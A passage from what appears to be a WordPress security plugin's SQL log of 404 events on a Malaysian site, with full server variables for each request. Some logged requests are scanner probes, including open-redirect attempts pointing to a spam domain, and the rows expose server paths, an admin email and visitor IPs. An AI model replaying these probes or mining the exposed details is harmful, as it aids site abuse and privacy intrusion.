01:50:08',35274152,37070424,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.107.198'),(28725,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"2ED2D67A-6D0E-46C7-B9B0-889F687C3A6E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@miK6CYj3S7An3VFFNpAAAAVY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.139.175.208\";s:11:\"REMOTE_PORT\";s:5:\"60074\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa@miK6CYj3S7An3VFFNpAAAAVY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571792520.6176\";s:12:\"REQUEST_TIME\";s:10:\"1571792520\";}}','notice','2019-10-23 01:02:03','2019-10-23 01:02:01',35667816,37471872,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.175.208'),(28724,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:111:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:109:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"201.148.125.34\";s:11:\"REMOTE_PORT\";s:5:\"48645\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa@gQzbsgZA4pads4ITCsgAAAEc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571790915.7673\";s:12:\"REQUEST_TIME\";s:10:\"1571790915\";}}','notice','2019-10-23 00:35:17','2019-10-23 00:35:16',34924360,36727152,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'201.148.125.34'),(28723,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.11.68 (KHTML, like Gecko) Chrome/53.6.0969.5697 Safari/534.50\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"177.54.195.48\";s:11:\"REMOTE_PORT\";s:5:\"39518\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa@e2@HARMCuuKQiJT-oFQAAANM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571790555.5791\";s:12:\"REQUEST_TIME\";s:10:\"1571790555\";}}','notice','2019-10-23 00:29:18','2019-10-23 00:29:16',35419232,37228736,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'177.54.195.48'),(28722,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"147.135.225.193\";s:11:\"REMOTE_PORT\";s:5:\"58095\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa9z3iGcwml6EYyVWZHJBgAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571779550.5656\";s:12:\"REQUEST_TIME\";s:10:\"1571779550\";}}','notice','2019-10-22 21:25:53','2019-10-22 21:25:50',35311952,37117368,'https://bintara.com.my/?page_id=18',1,0,'147.135.225.193'),(28721,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360SE\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"104.160.4.112\";s:11:\"REMOTE_PORT\";s:5:\"33902\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa9jcO4vBmywCERyagfP1AAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571775344.7898\";s:12:\"REQUEST_TIME\";s:10:\"1571775344\";}}','notice','2019-10-22 20:15:46','2019-10-22 20:15:45',34918208,36724928,'https://bintara.com.my/?page_id=18',1,0,'104.160.4.112'),(28720,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:111:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.39 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:109:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"154.16.16.194\";s:11:\"REMOTE_PORT\";s:5:\"34995\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa9XOO4vBmywCERyagfJwAAAAQ0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571772217.1358\";s:12:\"REQUEST_TIME\";s:10:\"1571772217\";}}','notice','2019-10-22 19:23:40','2019-10-22 19:23:37',35321448,37127424,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'154.16.16.194'),(28719,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:5:\"/?p=8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:3:\"p=8\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"84.17.58.4\";s:11:\"REMOTE_PORT\";s:5:\"57278\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa9LPNaMiBShLW1lPtf-gQAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571769148.7547\";s:12:\"REQUEST_TIME\";s:10:\"1571769148\";}}','notice','2019-10-22 18:32:31','2019-10-22 18:32:29',35314224,37116032,'https://bintara.com.my/?p=8',1,0,'84.17.58.4'),(28718,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:40:\"/dev/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/dev/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/dev/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa9HqO4vBmywCERyagfC8QAAARY\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/dev/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/dev/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa9HqO4vBmywCERyagfC8QAAARY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"132.148.80.15\";s:11:\"REMOTE_PORT\";s:5:\"60444\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/dev/\";s:10:\"SCRIPT_URL\";s:5:\"/dev/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa9HqO4vBmywCERyagfC8QAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571768232.5098\";s:12:\"REQUEST_TIME\";s:10:\"1571768232\";}}','notice','2019-10-22 18:17:14','2019-10-22 18:17:12',34968856,36765400,'https://bintara.com.my/dev/?initiationactivity=initiationready',1,0,'132.148.80.15'),(28717,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/dev/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/dev/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/dev/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa9HRDbsgZA4pads4IS0mwAAAEA\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/dev/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/dev/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa9HRDbsgZA4pads4IS0mwAAAEA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"132.148.80.15\";s:11:\"REMOTE_PORT\";s:5:\"47932\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/dev/\";s:10:\"SCRIPT_URL\";s:5:\"/dev/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa9HRDbsgZA4pads4IS0mwAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571768132.8984\";s:12:\"REQUEST_TIME\";s:10:\"1571768132\";}}','notice','2019-10-22 18:15:34','2019-10-22 